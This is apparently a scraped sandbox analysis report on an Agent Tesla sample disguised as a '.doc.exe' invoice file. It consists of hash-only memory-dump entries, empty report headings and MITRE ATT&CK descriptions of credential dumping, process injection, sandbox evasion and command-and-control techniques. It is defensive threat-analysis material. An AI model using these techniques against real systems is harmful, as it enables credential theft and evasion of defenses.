Source File: 0000001B.00000002.5637859676.000000001DB1D000.00000040.00000001.sdmp, Offset: 1DB1D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a2487e9be5c9ebf354a8b4f91e70591bf9483715d938a954cfc2c3fad7992ec
Instruction ID: 8eb8a95df1247c656a2b00f0151b49d228fc31fa2dca185342c856a3c0b99287
Opcode Fuzzy Hash: 1a2487e9be5c9ebf354a8b4f91e70591bf9483715d938a954cfc2c3fad7992ec
Instruction Fuzzy Hash: E821C471504240DFDB06EF58E9C0B16BFA5FB88718F24C569D90A0F246C376D456CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 1DB2D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.5637996082.000000001DB2D000.00000040.00000001.sdmp, Offset: 1DB2D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d3bf1b581e27fae478e098b491425b84717072b793a854706b68235ba034152
Instruction ID: 60613e3216cca55932bdd829e6a90d64b12fa289114b593fdbc3f398821595f3
Opcode Fuzzy Hash: 1d3bf1b581e27fae478e098b491425b84717072b793a854706b68235ba034152
Instruction Fuzzy Hash: 8A210676504240DFCB01CF68D990B17BBA5FB84714F60C56DD90E4B256C736E407CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 1DB2D006, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.5637996082.000000001DB2D000.00000040.00000001.sdmp, Offset: 1DB2D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d74ea00f20d2e05bf6339f7f620a6a3e86dbdfc4f6558e15cdfce8fa10a1d670
Instruction ID: c01d0e133a1b8f00e2892aba46d31f2d2a4ab9f46b7465c138a86eb2add713c9
Opcode Fuzzy Hash: d74ea00f20d2e05bf6339f7f620a6a3e86dbdfc4f6558e15cdfce8fa10a1d670
Instruction Fuzzy Hash: 942150755083809FC702CF24D994B16BFB1EB46314F24C5DAD8498B267C33AE85ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 1DB1D4BF, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.5637859676.000000001DB1D000.00000040.00000001.sdmp, Offset: 1DB1D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 392261e14f7a5435eeea3e1aa93094f0a3635345005092d99e73b37a49dcb688
Instruction ID: 4a7c0718b430f5de9d3114bb59ea8008194598e05438bd204391202bba0f4630
Opcode Fuzzy Hash: 392261e14f7a5435eeea3e1aa93094f0a3635345005092d99e73b37a49dcb688
Instruction Fuzzy Hash: 4311E676904280CFCB01DF14D5C4B16BF71FB84314F24C5A9D8490F616C376D556CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 1DB1D3D3, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.5637859676.000000001DB1D000.00000040.00000001.sdmp, Offset: 1DB1D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 392261e14f7a5435eeea3e1aa93094f0a3635345005092d99e73b37a49dcb688
Instruction ID: cde4e3ddf188b5e6aff59388c8c5e85b9f491d55f6e95959836b14e2dc2ce38a
Opcode Fuzzy Hash: 392261e14f7a5435eeea3e1aa93094f0a3635345005092d99e73b37a49dcb688
Instruction Fuzzy Hash: 2E11E676504280DFCB01DF14D5C4B16BF71FB84724F24C6A9D90A0F616C33AE456CBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Fra FAC-ES101-2107-03806.doc.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Sigma Overview

Networking:

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre